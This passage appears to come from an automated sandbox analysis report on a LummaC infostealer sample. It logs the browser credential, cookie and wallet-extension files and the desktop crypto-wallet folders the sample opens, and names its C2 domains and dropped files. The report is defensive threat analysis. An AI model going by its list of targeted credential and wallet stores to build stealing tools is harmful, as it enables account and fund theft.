                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                      Source: Yara matchFile source: 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F05C @Rtlconsts@_sCannotListenOnOpen,@Rtlconsts@_sCannotCreateSocket,@Rtlconsts@_sSocketAlreadyOpen,@Rtlconsts@_sCantChangeWhileActive,@Rtlconsts@_sSocketMustBeBlocking,@Rtlconsts@_sSocketIOError,34_2_5000F05C

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		1
                      Masquerading                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		21
                      Virtualization/Sandbox Evasion                      		LSASS Memory1
                      Query Registry                      		Remote Desktop Protocol41
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		Logon Script (Windows)1
                      DLL Side-Loading                      		11
                      Process Injection                      		Security Account Manager421
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Deobfuscate/Decode Files or Information                      		NTDS21
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Abuse Elevation Control Mechanism                      		LSA Secrets3
                      Process Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      System Owner/User Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync12
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem245
                      System Information Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580732 Sample: SET_UP.exe Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 72 laborersquei.click 2->72 74 neqi.shop 2->74 76 klipsyzogey.shop 2->76 82 Suricata IDS alerts for network traffic 2->82 84 Found malware configuration 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 7 other signatures 2->88 12 SET_UP.exe 1 2->12         started        signatures3 process4 dnsIp5 78 laborersquei.click 104.21.89.250, 443, 49730, 49731 CLOUDFLARENETUS United States 12->78 80 klipsyzogey.shop 172.67.214.186, 443, 49744 CLOUDFLARENETUS United States 12->80 70 C:\Users\user\...\VER7RSX5CP4YEKECQGJ84KT.exe, PE32 12->70 dropped 96 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->96 98 Query firmware table information (likely to detect VMs) 12->98 100 Found many strings related to Crypto-Wallets (likely being stolen) 12->100 102 3 other signatures 12->102 17 VER7RSX5CP4YEKECQGJ84KT.exe 2 12->17         started        file6 signatures7 process8 file9 56 C:\Users\user\...\VER7RSX5CP4YEKECQGJ84KT.tmp, PE32 17->56 dropped 20 VER7RSX5CP4YEKECQGJ84KT.tmp 3 4 17->20         started        process10 file11 58 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->58 dropped 23 VER7RSX5CP4YEKECQGJ84KT.exe 2 20->23         started        process12 file13 60 C:\Users\user\...\VER7RSX5CP4YEKECQGJ84KT.tmp, PE32 23->60 dropped 26 VER7RSX5CP4YEKECQGJ84KT.tmp 5 13 23->26         started        